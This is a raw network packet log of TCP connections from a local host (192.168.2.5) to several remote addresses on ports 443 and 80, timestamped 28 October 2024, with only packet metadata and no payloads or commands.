                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.850923061 CET4434975013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.850939989 CET4434975113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.850999117 CET49750443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.851241112 CET49751443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.924375057 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.924427986 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.924660921 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926353931 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926372051 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926446915 CET49760443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926464081 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926609993 CET49759443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926634073 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926687002 CET49751443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926687002 CET49751443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926743031 CET4434975113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.926789045 CET4434975113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.937957048 CET49750443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.937993050 CET4434975013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.938010931 CET49750443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:22.938019991 CET4434975013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.030009031 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.030035973 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.030170918 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.112785101 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.112807989 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.114469051 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.114521980 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.114603996 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.114741087 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.114758015 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.171688080 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.171746016 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.210570097 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.235611916 CET49754443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.235641956 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.236776114 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.236835003 CET49754443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.253621101 CET49754443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.253746986 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.254398108 CET49754443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.254407883 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.463330984 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.463397026 CET49754443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.498326063 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.560126066 CET49754443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.560272932 CET4434975494.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.560332060 CET49754443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.656094074 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.672591925 CET49760443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.672609091 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.672627926 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.672981977 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.675132036 CET49760443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.675137997 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.688760042 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.688803911 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.689193964 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.689199924 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.689306021 CET49759443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.689358950 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.689678907 CET49759443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.689685106 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.809825897 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.812108040 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.812165022 CET49760443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.817109108 CET49760443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.817127943 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.817137957 CET49760443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.817143917 CET4434976013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.817236900 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.818841934 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.818893909 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.820502996 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.820688009 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.820734978 CET49759443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.825459003 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.825483084 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.825498104 CET49761443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.825505018 CET4434976113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.826088905 CET49759443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.826134920 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.826164961 CET49759443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.826180935 CET4434975913.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.841531038 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.841619015 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.841690063 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.847143888 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.847233057 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.847390890 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.849153042 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.849184990 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.849241018 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.853363037 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.853414059 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.855060101 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.855103016 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.855248928 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.855266094 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.869059086 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.869657040 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.869674921 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.869673014 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.870012045 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.870040894 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.870171070 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.870177031 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.870508909 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:23.870515108 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.027291059 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.027645111 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.027719975 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.028206110 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.028680086 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.028743029 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.032392979 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.032433033 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.032459974 CET49763443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.032474041 CET4434976313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.034671068 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.034688950 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.034703970 CET49764443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.034710884 CET4434976413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.052879095 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.052941084 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.053040981 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.058752060 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.058784008 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.059926987 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.059962034 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.060035944 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.060535908 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.060554028 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.095381021 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.095408916 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.095489025 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.097682953 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.097698927 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.600445032 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.602395058 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.641194105 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.648933887 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.649063110 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.694466114 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.803920031 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.823545933 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.884135008 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:24.941430092 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.170377016 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.170465946 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.215892076 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.215929031 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.216362953 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.216375113 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.216600895 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.216651917 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.216939926 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.216948986 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217109919 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217132092 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217437029 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217441082 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217607975 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217622995 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217940092 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.217945099 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.244426012 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.244442940 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.244863033 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.244869947 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.344177008 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.344362020 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.344432116 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.345035076 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.345047951 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.345448017 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.345499992 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.346473932 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.346529961 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.348081112 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.348262072 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.348315954 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.377407074 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.377520084 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.377619982 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.476773977 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.476783037 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.476861000 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.478785038 CET49784443192.168.2.518.239.83.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.478796005 CET4434978418.239.83.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548650026 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548690081 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548705101 CET49774443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548712969 CET4434977413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548716068 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548732996 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548746109 CET49771443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.548752069 CET4434977113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.549823999 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.549850941 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.549865007 CET49773443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.549877882 CET4434977313.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550626993 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550633907 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550651073 CET49772443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550662994 CET4434977213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550760984 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550765991 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550777912 CET49775443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.550781012 CET4434977513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.623338938 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.623393059 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.623476982 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.684417963 CET49790443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:25.684453964 CET4434979013.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.090127945 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.090173960 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.090270042 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.098570108 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.098607063 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.098772049 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.098980904 CET49793443192.168.2.5142.250.184.193
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.098997116 CET44349793142.250.184.193192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.102678061 CET49792443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.102696896 CET4434979213.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.103414059 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.103425980 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.103584051 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.103737116 CET49794443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.103748083 CET4434979413.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.109977961 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.110004902 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.110090017 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.110420942 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.110649109 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.112920046 CET49795443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.112934113 CET4434979513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.114933014 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.114957094 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.115192890 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.115629911 CET49797443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.115647078 CET4434979713.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.116343021 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.116830111 CET804979677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.116899014 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.118213892 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.118556976 CET4979680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.121929884 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.121943951 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.122314930 CET4434977620.190.159.0192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.123621941 CET49776443192.168.2.520.190.159.0
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:26.123668909 CET49776443192.168.2.520.190.159.0
